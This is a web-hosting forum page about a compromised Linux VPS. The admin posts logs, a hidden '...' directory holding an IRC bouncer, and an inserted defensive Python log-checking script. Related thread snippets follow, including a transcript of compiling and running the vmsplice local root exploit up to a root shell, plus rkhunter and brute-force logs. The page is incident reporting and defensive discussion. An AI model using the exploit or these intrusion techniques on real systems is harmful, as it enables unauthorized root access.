Linux System Compromised, Hacker In As "root"


I've been trying to fight off a hacker's attack for the past 24 hours. Chronologically, this is how the events evolved:

- Yesterday, I tried SSH-ing into my server as usual and I got an error saying that the host's key was not recognized, which made me a bit suspicious

- I tried logging into my VPS' PowerPanel, but my root password did not work, which I found disturbing. I reached out to support and they reset the password

- I ignored PuTTY's warning and SSH-ed into the server and was greeted by this, which I've never seen before:

Code:
Last login: Wed Mar 14 2007 14:13:35 -0500
No mail.
This made me even more conscious, and I started actively searching for indicators of a breach.

- The following processes were running, and I did not recognize them:

Code:
named 15756 0.0 0.4 36088 2256 ? S Mar14 0:00 /usr/sbin/named -u named -t /var/named/chroot

dmorg 26360 0.0 0.1 2264 872 pts/2 T 20:40 0:00 sh -c (cd /usr/share/man && (echo ".ll 14.2i"; echo ".pl 1100i"; /usr/bin/gunzip -c '/usr/share
dmorg 26361 0.0 0.1 2264 512 pts/2 T 20:40 0:00 sh -c (cd /usr/share/man && (echo ".ll 14.2i"; echo ".pl 1100i"; /usr/bin/gunzip -c '/usr/share
- Then I found a user called 'pma' in the /home directory, which I had never created. I could not find any suspicious files in the user's directory

- I finally spotted the point of breach in /var/log/messages:

Code:
Mar 15 15:05:25 xxxxxxxxx passwd(pam_unix)[28121]: password changed for root
Mar 15 15:06:34 xxxxxxxxx su(pam_unix)[30182]: session opened for user news by (uid=0)
Mar 15 15:07:16 xxxxxxxxx su(pam_unix)[30182]: session closed for user news
Mar 15 15:22:04 xxxxxxxxx sshd[20118]: Listener created on port 22.
Mar 15 15:22:04 xxxxxxxxx sshd[20119]: Daemon is running.
Mar 15 15:28:01 xxxxxxxxx su(pam_unix)[32568]: session opened for user pma by (uid=0)
Mar 15 15:28:45 xxxxxxxxx su(pam_unix)[32568]: session closed for user pma
Somehow they had gotten in as root and then opened sessions for news and pma.

- This morning I finally found where the hacker's files are hiding. He had created a new user overnight and a directory in there called "...". The folder contains various files:

Code:
[root@xxxxxxxxx root]# ls -al
total 445
drwxr-x--- 8 root root 1024 Mar 16 15:48 .
drwxr-xr-x 20 root root 1024 Mar 16 15:48 ..
drwxr-xr-x 2 1004 1004 1024 Dec 17 08:57 ...
-rw-r--r-- 1 root root 1126 Aug 23 1995 .Xresources
-rw------- 1 root root 14641 Mar 16 15:47 .bash_history
-rw-r--r-- 1 root root 24 Jun 10 2000 .bash_logout
-rw-r--r-- 1 root root 234 Jul 5 2001 .bash_profile
-rw-r--r-- 1 root root 176 Aug 23 1995 .bashrc
-rw-r--r-- 1 root root 210 Jun 10 2000 .cshrc
-rw------- 1 root root 38 Jul 26 2005 .mysql_history
drwx------ 2 root root 1024 Mar 15 18:01 .ssh
drwxr-xr-x 2 root root 1024 Mar 15 15:21 .ssh2
-rw-r--r-- 1 root root 196 Jul 11 2000 .tcshrc

Code:
[root@xxxxxxxxx root]# cd "..."
[root@xxxxxxxxx ...]# ls -al
total 420
drwxr-xr-x 2 1004 1004 1024 Dec 17 08:57 .
drwxr-x--- 8 root root 1024 Mar 16 15:48 ..
-rwxr-xr-x 1 1004 1004 141817 Sep 3 2001 init
-rw-r--r-- 1 1004 1004 113482 Mar 15 15:09 log
-rw------- 1 1004 1004 640 Feb 18 05:34 messages
-rw-r--r-- 1 1004 1004 664 Feb 27 01:12 muhrc
-rwxr-xr-x 1 1004 1004 165596 Nov 2 2004 pico
-rw------- 1 1004 1004 5 Mar 15 15:09 pid
[root@xxxxxxxxx ...]#
- Here's what's in the log file:

Code:
[root@xxxxxxxxx ...]# less log

[Thu 08 May 08:03:27] + ---------- NEW SESSION ----------
[Thu 08 May 08:03:27] + muh version 2.05d - starting log...
[Thu 08 May 08:03:27] + listening on port 6667.
[Thu 08 May 08:03:27] + muh's nick is 'StefanG'.
[Thu 08 May 08:03:27] + trying server 'geneva.ch.eu.undernet.org' on port 6667...
[Thu 08 May 08:03:28] + tcp-connection to 'geneva.ch.eu.undernet.org' established!
[Thu 08 May 08:03:29] + connected to 'Geneva.CH.EU.Undernet.org'.
[Thu 08 May 08:03:30] + caught client from 'pcp02588223pcs.shlb1201.mi.comcast.net'.
[Thu 08 May 08:03:45] + authorization successful!
[Thu 08 May 08:03:45] + reintroducing channels...

[Thu 08 May 08:07:54] + ---------- NEW SESSION ----------
[Thu 08 May 08:07:54] + muh version 2.05d - starting log...
[Thu 08 May 08:07:54] + listening on port 6667.
[Thu 08 May 08:07:54] + muh's nick is 'StefanG'.
[Thu 08 May 08:07:54] + trying server 'eu.undernet.org' on port 6667...
[Thu 08 May 08:07:55] + tcp-connection to 'eu.undernet.org' established!
[Thu 08 May 08:08:05] + connected to 'Diemen.NL.EU.Undernet.org'.
[Thu 08 May 08:08:05] + caught client from 'pcp02588223pcs.shlb1201.mi.comcast.net'.
[Thu 08 May 08:08:05] + authorization successful!
[Thu 08 May 08:08:05] + reintroducing channels...
There is a whole lot of these in that log file, and the timestamps look odd. I am not sure what all this is.

- This is where I am at right now. Can you guys help figure this thing out?
How did they get in? What sort of vulnerability are they using? How can I patch things up?

- Here is my server info:

Code:
[root@xxxxxxxxx ...]# uname -a
Linux xxxxxxxxx.org 2.6.9-023stab033.9-enterprise #1 SMP Tue Dec 5 14:40:57 MSK 2006 i686 athlon i386 GNU/Linux

[root@xxxxxxxxx httpd]# vmstat 5 5
procs -----------memory---------- ---swap-- -----io---- --system-- ----cpu----
r b swpd free buff cache si so bi bo in cs us sy id wa
1 0 0 390688 0 0 0 0 0 0 0 8365 1 0 99 0
0 0 0 390524 0 0 0 0 0 0 0 0 0 0 100 0
0 0 0 390524 0 0 0 0 0 0 0 0 0 0 100 0
0 0 0 390528 0 0 0 0 0 0 0 0 0 0 100 0
0 0 0 390528 0 0 0 0 0 0 0 0 0 0 100 0

- I have Apache & MySQL & PHP running. I host 3 websites. They run Simple Machines Forum 1.1.2, phpMyAdmin, phpcollab, awstats and that's about it.
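Added here as a defender's example, not code from the original post or its author: a small Python checker that replays the post's /var/log/messages excerpt and flags the events that turned out to matter (the root password change, root switching into accounts, an sshd restart), plus the directory-name trick behind "...". The account baseline and the su allowlist are assumptions standing in for the admin's own records.

```python
import re

# Constructed sample input: the pam_unix/sshd lines quoted in the post above,
# hostname left as the author's "xxxxxxxxx" placeholder.
SAMPLE_LOG = """\
Mar 15 15:05:25 xxxxxxxxx passwd(pam_unix)[28121]: password changed for root
Mar 15 15:06:34 xxxxxxxxx su(pam_unix)[30182]: session opened for user news by (uid=0)
Mar 15 15:07:16 xxxxxxxxx su(pam_unix)[30182]: session closed for user news
Mar 15 15:22:04 xxxxxxxxx sshd[20118]: Listener created on port 22.
Mar 15 15:22:04 xxxxxxxxx sshd[20119]: Daemon is running.
Mar 15 15:28:01 xxxxxxxxx su(pam_unix)[32568]: session opened for user pma by (uid=0)
Mar 15 15:28:45 xxxxxxxxx su(pam_unix)[32568]: session closed for user pma
"""

# Assumptions standing in for the admin's own records: the accounts that existed
# before the incident, and the accounts root is expected to su into (none here).
BASELINE_ACCOUNTS = {"root", "news", "dmorg"}
EXPECTED_SU_TARGETS = set()

# Classic BSD-syslog layout: "Mon DD HH:MM:SS host prog(module)[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[\w.-]+)(?:\((?P<module>\w+)\))?\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
PW_CHANGED_RE = re.compile(r"^password changed for (?P<user>\S+)$")
SESSION_OPEN_RE = re.compile(r"^session opened for user (?P<user>\S+) by \(uid=(?P<uid>\d+)\)$")


def parse_syslog_line(line):
    """Split one syslog line into its fields, or return None if it does not match."""
    m = SYSLOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_indicators(log_text, baseline=BASELINE_ACCOUNTS, expected_su=EXPECTED_SU_TARGETS):
    """Return (timestamp, severity, description) tuples for suspicious events."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_syslog_line(raw)
        if rec is None:
            continue
        prog, msg = rec["prog"], rec["msg"]

        # passwd(pam_unix) logs every password change; one for root is the headline event.
        m = PW_CHANGED_RE.match(msg)
        if m and prog == "passwd":
            sev = "critical" if m.group("user") == "root" else "notice"
            findings.append((rec["ts"], sev, f"password changed for {m.group('user')}"))
            continue

        # su(pam_unix) "by (uid=0)" means root switched into the named account.
        m = SESSION_OPEN_RE.match(msg)
        if m and prog == "su":
            user, uid = m.group("user"), m.group("uid")
            if user in expected_su:
                continue
            if user not in baseline:
                findings.append((rec["ts"], "critical", f"su to unknown account '{user}' by uid={uid}"))
            elif uid == "0":
                findings.append((rec["ts"], "warning", f"root switched to service account '{user}'"))
            continue

        # An sshd (re)start outside a planned maintenance window deserves a look at the binary.
        if prog == "sshd" and msg.startswith("Daemon is running"):
            findings.append((rec["ts"], "notice", "sshd (re)started; verify the sshd binary against its package"))
    return findings


def is_dot_disguised(name):
    """True for names such as '...' that hide next to '.' and '..' in 'ls -al' output."""
    return name not in (".", "..") and name.startswith("..")


if __name__ == "__main__":
    for ts, sev, desc in find_indicators(SAMPLE_LOG):
        print(f"{ts}  {sev:<8} {desc}")
    print("disguised:", [n for n in [".", "..", "...", ".ssh", ".ssh2"] if is_dot_disguised(n)])
```

Run it against a real /var/log/messages with `find_indicators(open(path).read())`; tune BASELINE_ACCOUNTS to the accounts you actually created.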



Related Forum Messages:
Hacker Got Root Password
I'm still trying to figure this one out. I got an email last night about 10:30pm that a weird IP had logged in as root. I thought it was a guy that helps with tech things but I ran the IP... it came back from Korea and I knew I was in trouble. I immediately logged into WHM and changed the root password then sent the server down for a reboot. He was only in there for about 3 minutes before I nailed him. I've banned the IP from the server and have been watching it for nearly 12 hours now and they haven't come back yet.

Now comes the task of trying to figure out how he got the password. This is mind boggling to me. He knew the password, like someone gave it to him... there were no incorrect guesses or brute force. The password was a series of random letters, both upper and lower case. Is it possible he got it through getting to /etc/passwd via a PHP script? I have open_basedir restrictions in place, can they get around that? I noticed at the time he logged in there were several IPs trying to exploit PHP scripts on my server, you know, setting the parameters to txt files, but I assumed with shell functions disabled (except exec) and with open_basedir this wouldn't be possible. Is there a hole in cPanel / PHP / kernel recently I may have missed?

Linux Server Compromised
Linux Fedora 5

I just got a letter from my dedicated host stating we had just been compromised. These servers just were set up last week! And there is nothing on them yet. The only thing I have done is modified the /etc/hosts file via SSH.

My servers are not even public yet. Can SSH'ing in from an unsecured wireless network make me vulnerable?

What do you guys think? Best way not to let this happen again?

Oh this is great :-| He's still logged in!

[root@server~]# who
root pts/0 2007-06-06 07:12 (xxx)
test pts/2 2007-06-06 03:08 (81.89.10.92)

Linux System
I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background?

Also please suggest me some good links from where I can get basic Linux commands and some kind of flash tutorials from which I get to know how to work in Apache and DNS etc.

how to download tar file using Terminal,

Rescue Linux System - UK Datacenter
Does rapidswitch and poundhost offer Rescue Linux System on their portal?

I want to load a linux distro on server RAM and do my own FreeBSD installation.

Learning Linux System Administration
Where would someone go to learn Linux System Administration?

Are the Redhat courses worthwhile?

Determining Operating System (Linux)
Without having all of the operating systems at my disposal for testing, I would like to figure out a way to determine the operating system of a remotely accessed Linux machine.

It seems pretty strange though, since cPanel reports both machines I am using as being

CENTOS Enterprise 4.5 i686, yet one's uname -a reports:

Code:
Linux hostsentry.crucialwebhost.com 2.6.9-023stab044.4-enterprise #1 SMP Thu May 24 17:41:23 MSD 2007 i686 i686 i386 GNU/Linux

Code:
Linux main.7kb.org 2.6.9-55.0.6.ELsmp #1 SMP Tue Sep 4 21:36:00 EDT 2007 i686 i686 i386 GNU/Linux
I'm assuming there is a way to determine the OS from this information. Anyone know how?

Apache Document Root On Linux
Basic question: does it matter where I set the document root for apache on a Linux system? I've googled this but haven't found a good answer.

This is for a VPS server running the Ubuntu (Debian) server os that I'm configuring. I'd prefer to simply create a new directory off the root and set that as the document root in the apache config file. Would this present any kind of security issue?

If that's no good, what's the best choice -- stick to the default?

Linux Vmsplice Local Root Exploit (2.6.17 - 2.6.24.1)
Get ready for another round of patching and reboots. See:
[url]

Linux vmsplice Local Root Exploit
By qaaz
Linux 2.6.17 - 2.6.24.1

Debian also has a report but I'm trying to avoid linking to the source of the exploit. It works on 2.6.24, but only once. Then the box kernel panics (did for me). 2.6.24.1 is out as of a couple of days ago, but I'm not sure if it's still vulnerable. Seems like it is.


luki@tester:/tmp$ gcc t.c -o t
luki@tester:/tmp$ ./t
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e6f000 .. 0xb7ea1000
[+] root
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@tester:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@tester:/tmp#

Which Linux Family Operating System Is More Stable
I would like to know which Linux family operating system is more stable and has better support for a dedicated server .....?

How To Install ASSP On Linux System Without Cpanel?
How to install ASSP on linux system without cpanel.

Latest Linux Gives Untrusted Users Root Access
Quote:

A software developer has uncovered a bug in most versions of Linux that could allow untrusted users to gain complete control over the open-source operating system.

The null pointer dereference flaw was only fixed in the upcoming 2.6.32 release candidate of the Linux kernel, making virtually all production versions in use at the moment vulnerable. While attacks can be prevented by implementing a common feature known as mmap_min_addr, the RHEL distribution, short for Red Hat Enterprise Linux, doesn't properly implement that protection, Brad Spengler, who discovered the bug in mid October, told The Register.

Read the complete article at The Register. New kernels are available for Redhat and CentOS (obviously), and likely others who may be affected.

Are Chained Root Ssl Certificates More Secure Than Single Root?
I have read that although chained root ssl certificates can be more difficult to install they are actually more secure since the root certificate cannot be compromised, only the intermediary.

Is this true? It looks like both Google and Amazon use chained SGC certs.

Possible Compromised Server
I can resolve this situation I have.

I sent a server I have with a provider to have a RAM upgrade yesterday at 15:33 UTC, and ever since then I have had no access to my server.

SSH has been changed back to port 22, from a random high port.
root password has changed
RSA key has changed too.

I can see 3 possible reasons for this:

1) It's a different server plugged into the rack/router or a stolen IP

2) My provider "kindly" formatted and reinstalled my OS.

3) I have a compromised server, I very much doubt this as the server was offline.

I informed my provider about 18 hours ago that I had a "possible compromised server" and since then I have been given the run around as to what is happening.

For the last couple hours or so I have been trying to get them on live chat, which shows as online, but no-one answers. That's another pet hate of mine.

I also have a couple tickets open asking for an update as they are not answering my original ticket with updates.

Am I just being impatient wanting a resolution to this in less than 18 hours or am I correct to complain?

Is My Server Compromised
I am trying to determine if I am hacked; here are the details:

I just got a message from softlayer support: ABUSE - 66.228.xxx,xxx - HACKING/MALICIOUS ACTIVITY - IMMEDIATE ACTION REQUIRED. with some log like this:
Quote:

Connection attempt to TCP IP.IP.IP.34:80
>from 66.228.xxx.xxx:41212 flags:0x02 Sep 28 14:05:55 PDT kernel:

Also, I did a rkhunter scan and found:

Quote:

cat /var/log/rkhunter.log | grep Warning
[18:26:29] /usr/bin/GET [ Warning ]
[18:26:29] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
[18:26:29] /usr/bin/groups [ Warning ]
[18:26:29] Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
[18:26:30] /usr/bin/ldd [ Warning ]
[18:26:30] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
[18:26:35] /usr/bin/whatis [ Warning ]
[18:26:35] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
[18:26:36] /sbin/ifdown [ Warning ]
[18:26:36] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[18:26:36] /sbin/ifup [ Warning ]
[18:26:36] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable

[18:27:43] Checking '/etc/xinetd.d/ftp_psa' for enabled services [ Warning ]
[18:27:44] Checking '/etc/xinetd.d/poppassd_psa' for enabled services [ Warning ]
[18:27:44] Checking '/etc/xinetd.d/smtp_psa' for enabled services [ Warning ]
[18:27:44] Checking '/etc/xinetd.d/smtps_psa' for enabled services [ Warning ]
[18:27:44] Checking for enabled xinetd services [ Warning ]
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa

[18:27:59] Checking for hidden files and directories [ Warning ]
[18:27:59] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression

[18:27:34] Checking running processes for deleted files [ Warning ]
[18:27:34] Warning: The following processes are using deleted files:
[18:27:34] Process: /usr/libexec/mysqld PID: 4773 File: /tmp/ib2RpbEj
[18:27:34] Process: /usr/sbin/httpd PID: 8449 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 8452 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 12102 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 12950 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 13044 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 13046 File: /tmp/.apc.PGGxew

So does that mean my server was compromised?

Server Compromised (ensim_sshd), What To Do
I receive reports from my DC that my server is launching some hacking / malicious activity. This is the log that they provide:

Quote:

Aug 20 12:34:35 ensim sshd[30628]: Did not receive identification string from MY.SERVER.IP
Aug 20 12:44:23 ensim sshd[444]: Failed password for admin from MY.SERVER.IP port 57896 ssh2
Aug 20 12:44:23 ensim sshd[444]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:26 ensim sshd[445]: Failed password for root from MY.SERVER.IP port 58029 ssh2
Aug 20 12:44:26 ensim sshd[445]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:28 ensim sshd[446]: Failed password for root from MY.SERVER.IP port 58141 ssh2
Aug 20 12:44:28 ensim sshd[446]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:31 ensim sshd[449]: Failed password for root from MY.SERVER.IP port 58276 ssh2
Aug 20 12:44:31 ensim sshd[449]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:33 ensim sshd[450]: Failed password for root from MY.SERVER.IP port 58421 ssh2
Aug 20 12:44:33 ensim sshd[450]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:36 ensim sshd[453]: Failed password for root from MY.SERVER.IP port 58565 ssh2
Aug 20 12:44:36 ensim sshd[453]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:38 ensim sshd[455]: Failed password for root from MY.SERVER.IP port 58672 ssh2
Aug 20 12:44:38 ensim sshd[455]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:41 ensim sshd[456]: Failed password for root from MY.SERVER.IP port 58787 ssh2
Aug 20 12:44:41 ensim sshd[456]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:43 ensim sshd[457]: Failed password for root from MY.SERVER.IP port 58961 ssh2
Aug 20 12:44:43 ensim sshd[457]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:46 ensim sshd[458]: Failed password for root from MY.SERVER.IP port 59132 ssh2
Aug 20 12:44:46 ensim sshd[458]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:48 ensim sshd[459]: Failed password for root from MY.SERVER.IP port 59348 ssh2
Aug 20 12:44:48 ensim sshd[459]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:51 ensim sshd[465]: Failed password for root from MY.SERVER.IP port 59495 ssh2
Aug 20 12:44:51 ensim sshd[465]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:53 ensim sshd[466]: Failed password for admin from MY.SERVER.IP port 59622 ssh2
Aug 20 12:44:53 ensim sshd[466]: Received disconnect from MY.SERVER.IP: 11: Bye Bye
Aug 20 12:44:56 ensim sshd[467]: Failed password for admin from MY.SERVER.IP port 59803 ssh2
Aug 20 12:44:56 ensim sshd[467]: Received disconnect from MY.SERVER.IP: 11:

How To Track Down A Compromised Php Script
I have a few shared hosting servers I run. One of them keeps getting listed on CBL. It is very frustrating. Does anyone have any tools, tips, or tricks on finding the compromised script?

So far I have confirmed that a script is using PHP to send mail out bypassing the MTA. It is faking the HELO and impersonating a well known ISP.

I used a combination of tshark and netstat. tshark can show me the HELO and EHLO. When I see the wrong entry I cross-check that with netstat to see what it is. But netstat only shows that it was PHP, not the script path.

Here are the commands I'm running:

Code:
nohup netstat -c -p -n -e | grep -i ":25" > /var/log/monitor/netstat-smtp.log &

nohup tshark -f "port 25 and src host XX.XX.XX.XX" > /var/log/monitor/tshark-smtp.log &
Then I grep for what I'm looking for:

grep -i "HELO" /var/log/monitor/tshark-smtp.log

Is there a way to get netstat to show the script path or complete command that is establishing the connection? Currently these scripts are eating up memory to a point that other processes are getting killed off.

I also tried to force all mail through the MTA, but when I enable SMTP_BLOCK in my firewall config I get an error:

*WARNING* Cannot use SMTP_BLOCK on this VPS as the Monolithic kernel does not support the iptables module ipt_owner - SMTP_BLOCK disabled.

If there is a better way I'm game. Maybe some IDS that can tell me more of what is going on with the server?

Web Hosting Where Security Cannot Be Compromised
I have read many helpful feedbacks regarding choosing a reliable web host. Most of the concerns are centered around costs. However, I am more particular about the relative security of my website in addition to other perks such as space, speed and bandwidth. I rate my concerns on a 1-10 scale:

Security 9/10
Bandwidth 7.5/10
Disk space 6/10
E-mails, backups, etc: 8/10
Cost: 7/10

Server Compromised – Steps For Recovery
One of the worst things (in hosting) has happened. I received a notice this morning from lfd (configserver) that someone had logged into my server as root and it wasn't me.

Unfortunately I didn’t notice it until eight hours later so I have no idea (yet) what happened during that period. Thankfully I don’t have any really critical data on the system that could have been stolen.

I'm in the process of restoring from a full system backup right now. After that's done I'm going to look to see what the differences are between the files from the backup and those on the compromised drive. I'm not sure if I'll get anything useful from the diff but hopefully I'll find a clue as to how they got root access.

Then of course I need to get my server back up. However, I don’t want to do this until I’ve taken some steps to identify how the individual got in and take some additional preventative steps.

Here’s what I am planning on doing:

1) Check to make sure all exposed services are patched and look at some security sites to see if there are any known vulnerabilities for these services. Anyone know which sites are good to look at?

2) Change firewall to only allow ssh access from a couple specific IP addresses.

3) Disable root ssh access so I have to login via a different account and perform sudos, etc.

4)?

I’ll also look for a good server-hardening guide to see if there are some obvious things I forgot to secure.

Do any of you fine folks have any other suggestions or resources that I should check out?

WHMCS Breach - Some 3.5.1 Downloads Were Compromised
I just received a fairly scary WHMCS notice, you can view the details here:

<<please don't paste the file names, there are accounts that may have these on them>>

What are your thoughts on the entire situation? Personally, I'm a tad fearful (luckily, I hadn't upgraded to the next version yet as I was letting the other users play beta-testers) given the fact that there wasn't any versioning / modification 'notification' system in place on their end.

I'm fearing further updates. In essence, my concern is that the WHMCS development team isn't entirely certain how they were backdoored or to what scale they were backdoored.

Are their own billing systems & servers hosted in the same environment, were our billing details also released? etc. I want to know the scale of the attack.

Windows Server Password Compromised
My windows server 2003 server password has been changed. My host tells me they must reload the entire OS in order to fix it..

Is there no way they can go in and rescue my server? Would save me alot of work.

Server Compromised, Where To Get A Good Sysadmin
So one of the sites on our box was compromised earlier today.

We've shut it down for now and contacted our sysadmin to help research the problem. Not sure if he will be able to really help much as he's only done updates and such in the past.

Any idea of quality sysadmins who might be able to investigate the box and the site?

Compromised Windows 2003 Server
I have been trying to troubleshoot our Windows 2003 server for weeks, but have made no headway. The following are the steps they take to breach the server.

“They” are able to create an account. Some used usernames they have created are: sysadmin, adm, mssqladm.

It is very odd: looking in the event viewer, they just appear to create accounts out of the blue, they don't even login or attempt to login or anything; all of a sudden it says, New Account Created.

“They” then change the password of the account they just created.

Then “They” assign themselves the following group permissions, ‘Users’, and ‘Administrators’. ** SHAKING MY HEAD ** How the bloody hell do they assign themselves Administrator rights?

Then they do a few different actions depending; often times they disable the Windows firewall and change open ports, other times they simply just log off, other times they have placed Trojan horses and other malware in the temporary internet folder under their user folder.

This has been a cat and mouse game for weeks. I catch the new account and immediately delete it, check the firewall and enable it if needed, then run a full system scan with AVG and Prevx. Sometimes AVG finds Trojans and malware, other times it's clear.

I have racked my brain, checked all running processes with Google, and they all seem legit. I have updated everything in Windows via Windows Update; we are running Windows 2003 Server SP2. I have looked at the users and groups and everything seems secure.

Do you guys have any idea what is going on? I have a feeling something is running internally, which is allowing them to create the accounts.

Is there a tool that tracks all currently running processes, and allows you to go look at the logs to see what exactly was running at a certain time?

Compromised Account At Gnax.net
Ok...posting this here to hopefully get someone's attention at gnax.net.

I've written their abuse@gnax.net and engineer@gnax.net multiple times and even called into their support line and spoke with Stephen (or Steven). No one there seems to care.

They have a group of Vietnamese hackers on their network that are launching attacks from several of their servers. They also have a Google phishing site on one of the servers.

Spoke with Stephen at Gnax support and his answer was that it wasn't his job and I needed to send an e-mail to abuse. After telling him that I'd done that multiple times he basically said oh well, that he didn't know what to do.

Seems like the admins of gnax.net are either very irresponsible, stupid or just ignorant.

Here are the URL's.

[url]

[url]

Just replace the 1's with t's and you can see for yourself. The fwooshnet.com site attempts to download a trojan to your system, so if you don't know what you're doing don't visit either URL.

Hopefully admins from Gnax watch this forum.

Hacker Dilema
I've got a couple of VPS accounts and one got hacked today. I received a domain creation email for a domain I didn't create; the password was "hackedonlyhost" and the contact was not my email but someone else's. The root password was changed etc etc, but I managed to get control of the VPS again.

Why am I posting this in the ded forum? Because the email in the account setup was for a hosting company. I traced the IP to LT. I've found this guy on a couple of hacker forums (Arabic, he's in Egypt), also using his email at his hosting company.

So, whilst he may not be breaking LT rules at all, do I bother contacting them to say they are providing services to a hacker?

Email Account Compromised: Tools For Analysing
whose has 5 email accounts and several computers Windows and Mac.

Some spam has been sent out to people in his address book. I received one and have the email headers.

What tools are there for identifying which account/machine has been compromised?

Softlayer - Hacker Fix
For those who are still under the softlayer hacker abuse please note you will need to re-load your server. We got hit a 2nd time after thinking everything was clean. Anyhow, for those who got hit again, my team and another from WHT - forgot who made the original clean.php script...

Anyhow, here is a tool to clean all the data for all of your users: Copy fixit.pl and clean4.php to a directory. IE: /home/yourusername

Change username "changeme" in fixit.pl to the username where clean4.php is located
execute fixit.pl: IE: perl fixit.pl. If you want to test this on one user uncomment the die statement. When you are ready to do the entire server comment the die statement.

fixit.pl (perl script) Author: Robert Saylor

#!/usr/bin/perl$config{'basepath'} .....

Hacker Safe Host
As with many sites, my site was hacked recently. My host was so negative about this; they didn't notice the hack attempt although it took the hacker 9 hours to break through.

After that I did some searching on my host to find that it is not a real host at all; they are just resellers for another company. I was very disappointed, then I decided to go to a better host who can protect me from hackers.

I read some threads about 'hacker safe hosts' but in general they don't give a real name of a trusted 'anti-hacker' company.

Can you guide me to some of the famous hosts?

If you can't, my friend has a VPS hosted with WestHost. He offered to move my site to his VPS. Is WestHost trusted about hackers?

Php Version Vs Hacker
There is some way that a hacker uses a .htaccess file to change the PHP version on the server to use the exploit.
Look, I run a PHP shell from my server:
[url]
You can see from the picture that my PHP version is 5.2.6.
Then I uploaded the .htaccess to my server and the version has been changed; look at the other picture:
[url]
You can see the .htaccess file.
This way only works if I have more than one PHP version on my server.
How can I secure my server from this?

Dealing With A Persistent Hacker
I was checking my business server's IIS errors logs when I ran across the following error:

2007-05-19 08:21:10 00.000.000.00 2243 00.000.000.000 80 HTTP/1.1 GET

/w00tw00t.at.ISC.SANS.DFind 400 - Hostname -

Additional information about those responsible for the hack attempts is as follows

(retrieved from domaintools.com):

CustName: ----------------(hidden by me)
Address: Private Address
City: Plano
StateProv: TX
PostalCode: 75075
Country: US
RegDate: 2005-08-27
Updated: 2005-08-27

Apparently this person was trying to use the dfind hacker tool to find vulnerabilities on my server. The IP address belongs to AT&T Yahoo, and I've already contacted them by email. I believe that subsequent hack attempts have originated from this IP; however, the IP address has been masked by the use of proxies. I think that this may be someone I know because the IP is only about an hour's drive from me. I'm starting to suspect a disgruntled former client who has friends living where that IP's from.

Has anyone here had any similar experiences?

What do you think AT&T Yahoo's response will be?

Is there anything else I can do or should not do?

I am also considering reimaging my server because of system issues but I am concerned that would erase any information needed for investigative purposes. I have saved my log files, though, on a CD but I'm thinking that AT&T Yahoo or whoever investigates this needs the server as it is.

1and1.com User Database Compromised, Sites Hacked
Even worse, they didn't even notice until I called. If you're a 1and1.com customer I recommend you change your username and password now!

I included some log snippets to help you make sure your account hasn't been compromised.

1and1.com hacked

Plesk IIS WP User & Compromised Server
My server (using plesk 8.1 on windows 2003 server) has been compromised with some sort of rootkit and I'm investigating vulnerabilities. This server hosts some of my asp.net applications and I have to grant Modify Permission to IIS WP (iwam_plesk) user on Some subfolders (under Httpdocs folder for each domain). Is it a security problem? if yes, how else can I allow asp.net applications to write to, say, an Access db?

How To Prevent Hacker Enter My Host
I want to ask for some tips to prevent hacker attacks on my blog. My friends experienced this and I don't want it to happen to me. Can web hosting technical support fix my host server if a hacker breaks into it?

How Would A Hacker Change A Cpanel Password
I'm having a problem with a hacker...using insecure scripts on my user's accounts he changes Cpanel passwords. I do not understand how a script running as user nobody would change a Cpanel password. Any ideas on that ?

I am using mod_security (rules from gotroot.com); register_globals is disabled. I also disabled the password reset feature, as I thought the hacker may be resetting the passwords and then reading the new password from the email account on the server using the insecure script.
